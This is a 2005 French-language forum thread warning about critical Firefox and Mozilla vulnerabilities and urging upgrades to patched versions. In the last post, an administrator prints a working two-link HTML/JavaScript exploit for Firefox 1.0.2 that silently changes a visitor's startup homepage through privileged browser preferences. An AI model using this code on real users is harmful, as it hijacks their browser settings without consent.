*Attention* Mise a jour critique pour Firefoxe et Mozilla

Discussion dans 'Support informatique' créé par Mitnick, 13 Mai 2005.

  1. Mitnick

    Mitnick Visiteur

    Inscrit:
    11 Mars 2005
    Messages:
    1101
    J'aime reçus:
    1
    trois critiques Vulnérabilités ont été découvertes dans la suite Internet Mozilla et le navigateur Firefox.

    toute personne possedant mn Firefox 1.0.3 lte7t ou mn Mozilla 1.7.7 lte7t DOIT installer la mise a jour de ces 2 suites,sinon les failles qui ont ete decouvertes ,permettent à n importe qui de prendre le contrôle à distance de ton ordinateur ,ou à un virus de s'exécuter automatiquement mn ay site web piégée.

    a installe :


    Firefox 1.0.4
    Mozilla Suite 1.7.8
     
  2. djamal21

    djamal21 Visiteur

    Inscrit:
    23 Mars 2005
    Messages:
    7
    J'aime reçus:
    0
    Merci khouya pour l info.
     
  3. Admin

    Admin Administrator Membre du personnel

    Inscrit:
    12 Novembre 2004
    Messages:
    6266
    J'aime reçus:
    539
    Sexe:
    Homme
    Localité:
    Maroc
    voici une faille touche a la version 1.0.2 ou antérieur.

    Par un simple code, jeu de deux liens, il est possible de mettre en page de démarrage chez la personne ayant cliqué sur les liens le site de notre choix.
    voici ce code :

    Citation:

    <a href="about:plugins" target="_search">Click Here First</a><br>
    <a href="javascript: var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components.interfaces.nsIPrefBranch); prefs.setCharPref('browser.startup.homepage','http://www.wladbladi.com');" target="_search">Next, Click Here</a></p>
     

Partager cette page

En poursuivant votre navigation sur ce site, vous acceptez l’utilisation de Cookies pour vous proposer des publicités ciblées ainsi que pour nos statistiques de fréquentation.